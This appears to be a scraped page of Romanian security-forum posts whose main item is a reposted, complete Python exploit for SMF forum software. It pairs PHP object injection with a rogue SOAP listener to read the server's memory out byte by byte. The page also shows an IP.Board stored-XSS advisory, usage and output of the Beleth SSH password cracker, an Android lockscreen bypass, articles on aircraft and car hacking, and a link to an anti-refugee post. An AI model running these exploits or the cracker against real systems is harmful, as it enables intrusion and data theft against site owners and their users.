Nytro

[h=1]SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit[/h] #!/usr/bin/python# -*- coding: iso-8859-15 -*- ############################################################################# # Title: SMF (Simple Machine Forum) <= 2.0.10 Remote Memory Exfiltration Exploit # Authors: Andrea Palazzo # <andrea [dot] palazzo [at] truel [dot] it> # Filippo Roncari # <filippo [dot] roncari [at] truel [dot] it> # Truel Lab ~ http://lab.truel.it # Requirements: SMF <= 2.0.10 # PHP <= 5.6.11 / 5.5.27 / 5.4.43 # Advisories: TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt # TL-2015-PHP06 http://lab.truel.it/d/advisories/TL-2015-PHP06.txt # TL-2015-SMF01 n/y/a # Details: http://lab.truel.it/2015/09/php-object-injection-the-dirty-way/ # Demo: https://www.youtube.com/watch?v=dNRXTt7XQxs ############################################################################ import sys, requests, time, os, socket, thread, base64, string, urllib from multiprocessing import Process #Payload Config bytes_num = 000 #num of bytes to dump address = 000 #starting memory address #Target Config cookie = {'PHPSESSID' : '000'} #SMF session cookie target_host = 'http://localhost/smf/index.php' #URL of target installation index.php csrftoken = '' #Local Server Config host = "localhost" port = 31337 #Memory dump variables dumped = '' current_dump = '' in_string = False brute_index = 0 brute_list = list(string.ascii_letters + string.digits) r_ok = 'HTTP/1.0 200 OK' + '\n' r_re = 'HTTP/1.0 302 OK' + '\n' r_body = '''Server: Truel-Server Content-Type: text/xml Connection: keep-alive Content-Length: 395 <env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope"> <env:Header> <n:alertcontrol xmlns:n="http://example.org/alertcontrol"> <n:priority>1</n:priority> <n:expires>2001-06-22T14:00:00-05:00</n:expires> </n:alertcontrol> </env:Header> <env:Body> <m:alert xmlns:m="http://example.org/alert"> <m:msg>Truel</m:msg> </m:alert> </env:Body> </env:Envelope>''' def serverStart(): print "[+] Setting up local server on port " + str(port) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if not sock: print "[X] Fatal Error: Unable to create socket" sock.bind((host, port)) sock.listen(1) return sock def getToken(): global csrftoken print "[+] Trying to get a valid CSRF token" for n in range(3): #3 attempts r = requests.get(target_host, cookies=cookie, allow_redirects=False) r = r.text if(r.find("action=logout;")!=-1): break start = r.find("action=logout;") if (start !=-1): end = (r[start+14:]).find('">') csrftoken = r[start+14 : start+end+14] print "[+] Authentication done. Got token " + str(csrftoken) return True else: print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID." return False def prepareForExploit(): if not(getToken()): #get CSRF token os._exit(1) target = target_host + '?action=suggest&' + csrftoken + '&search_param=test' r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request return def forgePayload(current_try, address): location = "http://" + current_try payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}' return payload def sendPayload(payload,null): target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens try: r = requests.get(target, cookies=cookie, allow_redirects=False) except requests.exceptions.RequestException: print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)" os._exit(1) return def limitReached(dumped): if(len(dumped) >= bytes_num): return True else: return False def printDumped(dumped): d = " " cnt = 1 print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host print "[+] ======================= Dumped Data =======================" for i in range(bytes_num): d = d + str(dumped[i]) if (cnt % 48 == 0): print d d = " " if (cnt == bytes_num): print d cnt = cnt + 1 def getSoapRequest(sock): connection, sender = sock.accept() request = connection.recv(8192) return (connection, request) def sendSoapResponse(connection, content): connection.send(content) connection.close() return def getDumpedFromHost(request): i = request.find("Host: ") + 6 v = request[i:i+1] return v def pushDumped(value, string): global dumped global current_dump global brute_index global address global in_string dumped = str(value) + str(dumped) if(string): current_dump = str(value) + str(current_dump) else: current_dump = "" in_string = string address = address-1 brute_index = 0 print "[" + hex(address) + "] " + str(value) return def bruteViaResponse(sock): global brute_index current_try = "" response_ok = r_ok + r_body for n in range(19): connection, request = getSoapRequest(sock) if not request: connection.close() return False if request.find("owned")!=-1: pushDumped(getDumpedFromHost(request), True) sendSoapResponse(connection,response_ok) return True else: if((brute_index+1) == len(brute_list)): sendSoapResponse(connection,response_ok) return False brute_index = brute_index + 1 if not in_string: current_try = brute_list[brute_index] else: current_try = brute_list[brute_index] + str(current_dump) response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body sendSoapResponse(connection,response_re) connection, request = getSoapRequest(sock) if request.find("owned")!=-1: pushDumped(getDumpedFromHost(request), True) sendSoapResponse(connection,response_ok) return True sendSoapResponse(connection,response_ok) return False def bruteViaRequest(sock): global brute_index brute_index = 0 current_try = "" while(True): if(brute_index == len(brute_list)): pushDumped(".", False) if limitReached(dumped): printDumped(dumped) return if not in_string: current_try = brute_list[brute_index] else: current_try = brute_list[brute_index] + str(current_dump) payload = forgePayload(current_try,address) thread.start_new_thread(sendPayload,(payload,"")) if not bruteViaResponse(sock): brute_index = brute_index + 1 return def runExploit(): print "[+] Starting exploit" sock = serverStart() prepareForExploit() print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host) bruteViaRequest(sock) sock.close() print "[+] Bye ~ Truel Lab (http://lab.truel.it)" sys.exit(0) runExploit() Sursa: https://www.exploit-db.com/exploits/38304/

LinkOfDeath.com - when it will catch you it will kill you('r tab)

Lu ala cu vn5socks m-am plictisit de cate ori i-am dat ban si l-am lasat sa faca spam intr-un topic Edit: Le-am dat ban, dar parca vad peste 2-3 ore din nou posturi . Eh, cel putin ajuta la SEO. Cred.

BitDefender Internet Security 2016 – 6 luni licenta GRATUITA! By Radu FaraVirusi(com) on September 21, 2015 BitDefender a lansat gamei de produse BitDefender 2016, ce aduce cateva modificari notabile. Acum puteti avea licenta GRATUITA timp de 6 luni de zile pentru produsul BitDefender Internet Security 2016. A fost adaugata protectie impotriva programelor malitioase de tip ransomware (care blocheaza PC-ul si cer o rascumparare in bani pentru deblocare) – asigura un scut impotriva accesului aplicatiilor necunoscute la documentele personale. Motorul BitDefender a fost imbunatatit cu o tehnologie denumita “machine learning-based technologies”, permitandu-i sa detecteze amenintari noi mai repede ca niciodata. Firewall-ul a fost rescris si are o performanta imbunatatita. Au fost aduse modificari si modulelor password manager, control parental, criptarea fisierelor si utilitarelor anti furt. Pentru a obtine licenta GRATUITA accesati site-ul: Get 6 Months Free Of Bitdefender! The Best Protection Against Cyber-Threats. Sursa: BitDefender Internet Security 2016 – 6 luni licenta GRATUITA!

Sa ne spui si noua daca afli mai multe despre evenimentul de la CERT. O sa fie tehnic? Eu cred ca o sa fie de "informare generala". Cel de la Provision se poate descrie intr-un singur cuvant: SALES. Owasp o sa fie interesant.

Da, nu se merita. Nu e pentru noi.

9:2 A Sermon on Newton and Turing 9:3 Globalstar Satellite Communications 9:4 Keenly Spraying the Kernel Pools 9:5 The Second Underhanded Crypto Contest 9:6 Cross VM Communications 9:7 Antivirus Tumors 9:8 A Recipe for TCP/IPA 9:9 Mischief with AX.25 and APRS 9:10 Napravi i ti Ra?cunar „Galaksija“ 9:11 Root Rights are a Grrl’s Best Friend! 9:12 What If You Could Listen to This PDF? 9:13 Oona’s Puzzle Corner! Link: https://www.alchemistowl.org/pocorgtfo/pocorgtfo09.pdf

Android 5.x Lockscreen Bypass (CVE-2015-3860) Posted on September 15, 2015 by jgor A vulnerability exists in Android 5.x <= 5.1.1 (before build LMY48M) that allows an attacker to crash the lockscreen and gain full access to a locked device, even if encryption is enabled on the device. By manipulating a sufficiently large string in the password field when the camera app is active an attacker is able to destabilize the lockscreen, causing it to crash to the home screen. At this point arbitrary applications can be run or adb developer access can be enabled to gain full access to the device and expose any data contained therein. September 2015: Elevation of Privilege Vulnerability in Lockscreen (CVE-2015-3860) The attack requires the following criteria: Attacker must have physical access to the device User must have a password set (pattern / pin configurations do not appear to be exploitable) Proof-of-concept – Nexus 4 factory image 5.1.1 (build LMY48I): Sursa: Android 5.x Lockscreen Bypass (CVE-2015-3860) | UT Austin Information Security Office

Ce va mai place sa comentati aiurea... Daca nu va intereseaza, nu postati. Ramaneti la McDonalds.

Da, e smechera dracia aia, web shell rapid

You are za best! Thanks!

Nu stiu daca s-a mai postat: Criza refugia?ilor e de fapt o invazie musulman? organizat? | NapocaNews

O sa fie si un workshop de web security: https://www.owasp.org/index.php/OWASP_EEE_Bucharest_Event_2015#tab=Agenda Daca sunteti interesati, sau aveti prieteni care lucreaza pe web, vi-l recomand.

Asta as vrea si eu sa inteleg. Ce as putea face cu un astfel de cont?

My first Defcon experience Defcon is a meta-conference which anyone passionate by IT security should attend. It is more than a conference, it is the heaven of hackers and security professionals, a place where definitely you will find something both cool and useful, even if you are interested in web security, reverse engineering, social engineering, hardware, lock-picking, Internet of Things or car-hacking topics. Articol: My first Defcon experience – Security Café Cate poze si pareri despre conferinta. Din pacate, nu am apucat sa vad tot ce era acolo. Sper sa ajung si la anul.

Lame.

Daca e adevarat, e doar un motiv in plus sa il folosesc. Oricum, din declaratiile lor, am inteles ca diverse firme de AV le foloseau semnaturile. Le furau. Deci mi s-ar parea o razbunare geniala.

[h=1]IP.Board 4.X - Stored XSS[/h] # Exploit Title: IP.Board 4.X Stored XSS # Date: 27-08-2015 # Software Link: https://www.invisionpower.com/ # Exploit Author: snop. # Contact: http://twitter.com/rabbitz_org # Website: http://rabbitz.org # Category: webapps 1. Description A registered or non-registered user can create a calendar event including malicious JavaScript code who will be permanently stored in the pages source. 2. Proof of Concept http://URL_TO_FORUM/calendar/submit/?calendar=1 POST: Affected Paramter: event_location[address][] 3. Solution Update to version 4.0.12.1 https://community.invisionpower.com/release-notes/40121-r22/ Disclosure Timeline 27.07.15: Vendor notified 05.08.15: Fix released 27.08.15: Public disclosure Sursa: https://www.exploit-db.com/exploits/37989/

bot/gate.php Doesn't look like "educational purposes".

Beleth - Dictionary based SSH cracker Usage: ./beleth [OPTIONS] -c [payload] Execute payload on remote server once logged in -h Display this help -l [threads] Limit threads to given number. Default: 4 -p [port] Specify remote port -P [password] Use single password attempt -t [target] Attempt connections to this server -u [user] Attempt connection using this username -v -v (Show attempts) -vv (Show debugging) -w [wordlist] Use this wordlist. Defaults to wordlist.txt Example: $ ./beleth -l 15 -t 127.0.0.1 -u stderr -w wordlist.txt ?????????????????????????????????????????? ? Beleth ? ? www.chokepoint.net ? ?????????????????????????????????????????? [*] Read 25 passwords from file. [*] Starting task manager [*] Spawning 15 threads [*] Starting attack on root@127.0.0.1:22 [*] Authentication succeeded (root:jesus@127.0.0.1:22) [*] Executing: uname -a [*] Linux eclipse 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1+deb7u1 i686 GNU/Linux [*] Cleaning up child processes. Sursa: https://github.com/chokepoint/Beleth

Hacking an aircraft: is it already real? August 26, 2015 Ilja Shatilin In-flight security made quite a lot of headlines earlier this summer, but this time at unusual angle. Aviation has always been focused on safety and had remained the most secure industry that ever existed. However, the buzz was about another aspect of security — the one quite surprising for an average passenger and quite expected for an IT specialist. It’s not a secret that today’s aircraft are one huge computer, with the pilot being more of a PC operator rather than of an actual ‘ace’ pilot — he handles a single task of supervising smart machinery. An orientation pilot and a panel operator are no more, fully replaced by computers. As it turned out that those computers are as hackable as the rest. The potential impact of a hacker attack on a plane is devastating: just think of a terrorist who would no longer have to hold passengers hostages, or break into the cockpit. The only thing the culprit would need for him to wreak havoc is a laptop. The wave of panic emerged in spring with the report on on-board Wi-Fi security published by US Government Accountability Office. The relevance between aviation, cybersecurity and GAO remains unclear, yet some media outlets managed to invent a lot of dreadful stories for the common folk: according to a number of publications, terrorists now would be able to hijack planes while sitting with a tablet in the backyard and making target aircrafts land in the same yard. The @USGAO has 168 #security recommendations to improve FAA network security. http://t.co/IwyzS55anS — Threatpost (@threatpost) March 3, 2015 Obviously no one bothered to read the full report: aerophobic people craved for another reason to believe airplanes were the most dangerous means of transportation. At the same time, the report is a terrific bore: it contains pages and pages of claims that since Internet is accessible on board through Wi-Fi and satellite, it’s time the industry thought of securing this channel. An unencrypted 802.11 network is insecure per se, and in this very application it serves as a local network, like the one you have at home or in the office, so someone could log in and hack other devices connected to this on-board network. The possibility of getting access to flight management systems through on-board Wi-Fi is referenced as theoretically plausible, since no one even managed to do that. However, then an extravagant and, obviously, hungry for fame aviation security researcher popped up out of nowhere. Chris Roberts boarded onto a United flight and tweeted: “Find myself on a 737/800, lets see Box-IFE-ICE-SATCOM, ? Shall we start playing with EICAS messages? “PASS OXYGEN ON” Anyone ? ” Find myself on a 737/800, lets see Box-IFE-ICE-SATCOM, ? Shall we start playing with EICAS messages? "PASS OXYGEN ON" Anyone ? — Chris Roberts (@Sidragon1) April 15, 2015 As a result, upon landing in the destination airport he was approached by strangers who urged him to follow them, as it later turned out, into a dimly lit room with FBI agents. His laptop and tablet were confiscated for further investigation and he was held for questioning for hours. The airline, meanwhile, cancelled his return ticket. The tweet was a joke that was supposed to attract attention to Roberts: he had been dealing with in-flight systems security for a number of years, without particular attention from the industry players. Later during investigation, Roberts admitted he managed to gain control over flight management system for a brief period of time and even was able to change the direction of the flight. Moreover, he revealed the details of the ‘hack': he tampered with in-flight entertainment system by connecting to its bus through a custom adapter. Except for the hacker’s word, there is no proof he actually managed to hijack control over the flight management system. Drawing a different course on the maps broadcasted on the passengers’ multimedia displays and really changing is not the same thing. If the course had really been changed, it would not go unnoticed by pilots and dispatches, which would provide reason enough for a very serious investigation. Hacking an #aircraft: is it already real? #infosec #aviation #security Tweet Digital Security, a Russian security firm, studied 500 flights of 30 different airlines during five years and found out that there are security vulnerabilities on planes, and hackers have tried to exploit them in order to discover the potential of such hacks. If briefly summarized, there are certain entry points in the aircraft’s IT systems which are of interest for culprits: Flight Management System Router of another networking appliance which facilitates communication between systems, for instance, SATCOM, a satellite communication server Multimedia server Terminal multimedia devices An easy target would be a multimedia device, which is built into the seat in front of the passenger. Once it is attacked, a hacker is able to infiltrate its operation system and use it to compromise other systems. There are several ways to execute such an attack. One could leverage a vulnerable USB port to plug in a keyboard emulator and send commands into the system. Or, or instance, it’s possible to exploit a bug in the software responsible for multimedia playback from a thumb drive. Some aircrafts, in addition to USB, have complementary RJ-45 ports, which enable a wider arsenal of hacking tricks on a connected laptop. A savvy hacker would be able to gain control over the entire in-flight multimedia system and even get hold of a multimedia server, which is challenging but feasible. The main thing: some aircrafts feature RJ-45 ports marked as “Private use only.” It’s possible that once connected through this port, a hacker would be able to access critical system elements. There is no evidence of such attack offering access to flight management systems, though. At the same time, there were cases of malfunctioning due to software bugs. Recently, three of four engines of a cargo Airbus failed during takeoff because the calibration data was lost due to incorrect software update, resulting in a crash. Airbus confirms software configuration error caused plane crash http://t.co/cw6IRPZUUW by @thepacketrat — Ars Technica (@arstechnica) June 1, 2015 This happened because programmers did not think of an alert for these types of failures. They did not even think that those configuration files would go amiss: software updates are supposed to check whether configuration files are there. Due to this flaw, the sensor data was interpreted incorrectly; the main computer thought that the affected engines failed and turned them off – software developers did not consider simultaneous failure of more than two engines: with only two functional engines the plane would have continued the flight and successfully performed an emergency landing. A bug was also discovered in Boeing planes: Boeing 787 Dreamliner may suffer from the complete electrical shutdown during the flight: if all four power generators are launched simultaneously and operate incessantly during 248 days, they’d shut down in an emergency mode, leaving the plane in a blackout. US aviation authority: Boeing 787 software bug could cause 'loss of control' http://t.co/fFUqjlR3DX — The Guardian (@guardian) May 1, 2015 The reason of the failure is simple: stack overflow in the internal timer. It’s understandable that such a coincidence is hardly plausible in real life scenarios, but this case may serve the reminder that an aircraft managed by a computer is susceptible to the same flaws as any other computer, including your desktop. So, don’t be surprised once you learn about Kaspersky Inflight Security’s availability on the market. Sursa: https://blog.kaspersky.com/hacking-aircraft-is-it-real/9659/

[h=1]DEF CON 23 - Charlie Miller & Chris Valasek - Remote Exploitation of an Unaltered Passenger Vehicle[/h] Although the hacking of automobiles is a topic often discussed, details regarding successful attacks, if ever made public, are non-comprehensive at best. The ambiguous nature of automotive security leads to narratives that are polar opposites: either we’re all going to die or our cars are perfectly safe. In this talk, we will show the reality of car hacking by demonstrating exactly how a remote attack works against an unaltered, factory vehicle. Starting with remote exploitation, we will show how to pivot through different pieces of the vehicle’s hardware in order to be able to send messages on the CAN bus to critical electronic control units. We will conclude by showing several CAN messages that affect physical systems of the vehicle. By chaining these elements together, we will demonstrate the reality and limitations of remote car attacks. Charlie Miller is a security engineer at Twitter, a hacker, and a gentleman. Back when he still had time to research, he was the first with a public remote exploit for both the iPhone and the G1 Android phone. He is a four time winner of the CanSecWest Pwn2Own competition. He has authored three information security books and holds a PhD from the University of Notre Dame. He has hacked browsers, phones, cars, and batteries. Charlie spends his free time trying to get back together with Apple, but sadly they still list their relationship status as "It's complicated". Twitter: @0xcharlie Christopher Valasek is the Director of Vehicle Security Research at IOActive, an industry leader in comprehensive computer security services. Valasek specializes in offensive research methodologies with a focus in reverse engineering and exploitation. Valasek is known for his extensive research in the automotive field and his exploitation and reverse engineering of Windows. Valasek is also the Chairman of SummerCon, the nation's oldest hacker conference. He holds a B.S. in Computer Science from the University of Pittsburgh. Twitter: @nudehaberdasher

You have the code that does this here: https://github.com/NytroRST/NetRipper Read and understand.

A aplicat cineva la Call for Papers/Presentations?